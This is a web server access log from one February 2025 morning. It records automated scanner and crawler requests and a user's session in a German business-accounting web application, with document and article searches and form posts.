165.154.120.223 - - [11/Feb/2025:09:41:44 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
165.154.120.223 - - [11/Feb/2025:09:41:45 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
165.154.120.223 - - [11/Feb/2025:09:41:45 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
165.154.120.223 - - [11/Feb/2025:09:41:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/570.45 (KHTML, like Gecko) Chrome/89.0.1403 Safari/537.36"
165.154.120.223 - - [11/Feb/2025:09:41:46 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
165.154.120.223 - - [11/Feb/2025:09:41:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
165.154.120.223 - - [11/Feb/2025:09:41:46 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:48 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:48 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:48 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2_2) AppleWebKit/561.37 (KHTML, like Gecko) Chrome/51.0.1935 Safari/537.36"
118.193.45.235 - - [11/Feb/2025:09:42:50 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:51 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
118.193.45.235 - - [11/Feb/2025:09:42:51 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:05 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:05 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:05 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2_2) AppleWebKit/566.44 (KHTML, like Gecko) Chrome/76.0.146 Safari/537.36"
101.36.106.89 - - [11/Feb/2025:09:43:07 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:08 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
101.36.106.89 - - [11/Feb/2025:09:43:08 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
156.59.198.136 - - [11/Feb/2025:09:51:15 +0100] "GET /renault.activities.at/htdocs/binaries/10073812.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:09:59:15 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/FAQ.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
175.107.0.12 - - [11/Feb/2025:10:01:40 +0100] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-"
156.59.198.135 - - [11/Feb/2025:10:03:15 +0100] "GET /ed-test.2web.at/etc/redirects/redirects.xls HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:10:07:16 +0100] "GET /renault.activities.at/htdocs/binaries/10267576.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:10:11:16 +0100] "GET /renault.activities.at/htdocs/binaries/10449712.doc HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:10:15:16 +0100] "GET /renault.activities.at/htdocs/binaries/10122735.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:10:19:17 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/button.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1160 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:33 +0100] "GET /gui/javascript/form_form.js?1739265693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /gui/javascript/form_form.js?1739265693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /gui/javascript/form_form.js?1739265693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /gui/javascript/form_form.js?1739265693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /gui/javascript/form_form.js?1739265694 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /gui/javascript/form_form.js?1739265694 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:34 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:21:36 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:40 +0100] "GET /gui/javascript/form_form.js?1739265760 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:40 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2011 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:40 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:40 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:40 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:22:41 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
156.59.198.135 - - [11/Feb/2025:10:23:17 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/tinymce/skins/lightgray/fonts/readme.md HTTP/1.0" 404 346 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [11/Feb/2025:10:23:40 +0100] "GET /entry.php?id=10271&&ser=265760 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:23:41 +0100] "GET /gui/javascript/form_form.js?1739265820 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=265760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:24:41 +0100] "GET /entry.php?id=10271&&ser=265820 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=265760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:24:41 +0100] "GET /gui/javascript/form_form.js?1739265881 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=265820" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:25:41 +0100] "GET /entry.php?id=10271&&ser=265881 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=265820" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:25:41 +0100] "GET /gui/javascript/form_form.js?1739265941 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=265881" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:01 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9138 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:01 +0100] "GET /gui/javascript/form_form.js?1739265961 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:01 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1507 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3302 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1390 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1739265963 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /gui/javascript/form_form.js?1739265963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /gui/javascript/form_form.js?1739265963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /entry.php?id=11239&mode=document&form=10665& HTTP/1.1" 200 2017 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:04 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1739265964 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:04 +0100] "GET /gui/javascript/form_form.js?1739265964 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:03 +0100] "GET /entry.php?id=11240&mode=document&form=10665& HTTP/1.1" 200 2664 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:04 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:04 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2586 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:05 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 9329 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:05 +0100] "GET /gui/javascript/form_form.js?1739265965 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:06 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:06 +0100] "GET /gui/javascript/form_form.js?1739265966 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:08 +0100] "GET /entry.php?id=10877&mode=loadSearchCustomer&obj=number&tag=debitor&value=f&ser=1739260518037 HTTP/1.1" 200 325 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:08 +0100] "GET /entry.php?id=10877&mode=loadSearchCustomer&obj=number&tag=debitor&value=f.&ser=1739260518509 HTTP/1.1" 200 175 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:09 +0100] "POST /entry.php?id=10889 HTTP/1.1" 200 1759 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:10 +0100] "GET /gui/javascript/form_form.js?1739265969 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:21 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 8729 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:21 +0100] "GET /gui/javascript/form_form.js?1739265981 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:21 +0100] "GET /entry.php?id=10889&document_id=10347411& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:22 +0100] "GET /gui/javascript/form_form.js?1739265982 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=10347411&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:23 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 4992 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:23 +0100] "GET /gui/javascript/form_form.js?1739265983 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:23 +0100] "GET /entry.php?id=10889&document_id=10347411& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:28 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 5015 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:29 +0100] "GET /gui/javascript/form_form.js?1739265989 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:29 +0100] "GET /entry.php?id=10889&document_id=10347411& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:30 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 4791 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:30 +0100] "GET /gui/javascript/form_form.js?1739265990 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:30 +0100] "GET /entry.php?id=10830&&object=10347411&account=&mode=documentdebitor HTTP/1.1" 200 3132 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:30 +0100] "GET /gui/images/icons/ajax_loading.gif HTTP/1.1" 200 1542 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:30 +0100] "GET /entry.php?id=10889&document_id=10347411& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:31 +0100] "POST /entry.php?id=10889 HTTP/1.1" 200 1580 "http://hausegger.activities.at/entry.php?id=10889&document_id=10347411&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:31 +0100] "GET /gui/javascript/form_form.js?1739265991 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:32 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=7&ser=1739260542415 HTTP/1.1" 200 4407 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:33 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=76&ser=1739260542773 HTTP/1.1" 200 2017 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:33 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=760&ser=1739260542925 HTTP/1.1" 200 811 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:33 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=760-&ser=1739260543101 HTTP/1.1" 200 376 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:33 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=760-1&ser=1739260543357 HTTP/1.1" 200 279 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:34 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=760-12&ser=1739260543685 HTTP/1.1" 200 279 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:34 +0100] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=debit&refobject=10347411&value=760-125&ser=1739260543941 HTTP/1.1" 200 279 "http://hausegger.activities.at/entry.php?id=10830&&object=10347411&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [11/Feb/2025:10:26:35 +0100] "POST /entry.php?id=10889 HTTP/1.1" 200 1910 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
